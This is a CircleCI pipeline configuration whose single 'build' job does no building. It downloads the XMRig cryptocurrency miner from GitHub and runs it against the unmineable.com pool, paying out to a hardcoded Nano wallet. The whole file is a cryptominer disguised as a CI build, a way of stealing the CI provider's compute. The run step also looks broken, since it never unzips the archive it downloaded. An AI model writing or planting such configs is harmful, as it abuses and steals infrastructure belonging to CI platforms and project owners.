version: 2.1

orbs:
  win: circleci/windows@2.3.0

jobs:
  build:
    executor:
      name: win/default
      size: "medium" # can be "medium", "large", "xlarge", "2xlarge"
    steps:
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-msvc-win64.zip
      - run: xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u COIN:ANO:nano_1rq9zug5u68cj3q41iarsurzxwzha3ma5uc4idjretbtng4ekewrfqh8ersf.worker1 -p x pause 